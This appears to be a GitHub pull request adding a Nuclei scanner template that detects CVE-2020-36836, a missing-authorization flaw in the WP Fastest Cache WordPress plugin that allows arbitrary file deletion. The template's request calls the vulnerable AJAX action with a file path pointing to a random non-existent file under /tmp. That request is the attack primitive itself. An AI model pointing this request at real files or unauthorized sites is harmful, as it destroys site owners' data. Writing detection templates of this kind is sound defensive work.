### PR TITLE
feat(http): Add Nuclei template for CVE-2020-36836

### DIFF
--- a/http/cves/2020/CVE-2020-36836.yaml
+++ b/http/cves/2020/CVE-2020-36836.yaml
@@ -1,0 +1,48 @@
+id: CVE-2020-36836
+
+info:
+  name: WordPress WP Fastest Cache <= 0.9.0.2 - Broken Access Control
+  author: rajanarahul93
+  severity: high
+  description: |
+    The WP Fastest Cache plugin for WordPress through 0.9.0.2 is vulnerable to arbitrary file deletion due to a missing capability check on the 'wpfc_delete_current_page_cache' AJAX action. Any authenticated user, regardless of their role (e.g., Subscriber), can call this action and use a path traversal payload to delete arbitrary files on the filesystem. This template safely checks for the vulnerability by sending a request to delete a non-existent file and matching the success response.
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6e699a-775e-4c59-a266-874eab5fa3a6
+    - https://plugins.trac.wordpress.org/changeset/2342347/wp-fastest-cache
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-36836
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
+    cvss-score: 8.1
+    cve-id: CVE-2020-36836
+    cwe-id: CWE-862 # Missing Authorization
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: wpfastestcache
+    product: wp_fastest_cache
+    framework: wordpress
+    publicwww-query: "/wp-content/plugins/wp-fastest-cache/"
+  tags: cve,cve2020,wordpress,wp-plugin,wpfc,auth,bac,fileupload
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=wpfc_delete_current_page_cache&path=/tmp/{{randstr}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"success":true'
+          - '"message":"The cache of page has been cleared"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
/claim #13098

## Template / PR Information

This PR adds a Nuclei template for **CVE-2020-36836**, a high-severity **Broken Access Control** vulnerability in the **WP Fastest Cache** WordPress plugin (version <= 0.9.0.2).

- The template uses a safe, non-destructive check that verifies the flaw without altering the target system.  
- This approach is more reliable and safer than one that relies on actively deleting files.  

**Added template for CVE-2020-36836**

### References

- [NVD CVE-2020-36836](https://nvd.nist.gov/vuln/detail/CVE-2020-36836)  

Closes #13098  

---

## Template Validation

**Validated locally:** ✅ Yes  

### Additional Details

**Testing Steps:**
1. Set up a WordPress instance with a vulnerable plugin version.  
2. Create/login with a low-privileged user (e.g., Subscriber).  
3. From your browser’s developer tools, obtain the `wordpress_logged_in_...` cookie.  
4. Run Nuclei with the cookie header:  

   ```bash
   nuclei -t http/cves/2020/CVE-2020-36836.yaml \
     -u https://your-vulnerable-site.com \
     -H "Cookie: <paste-your-cookie-here>"


**Matched Response Snippet:**

```
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF--8

{"success":true,"message":"The cache of page has been cleared"}
```

---



### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)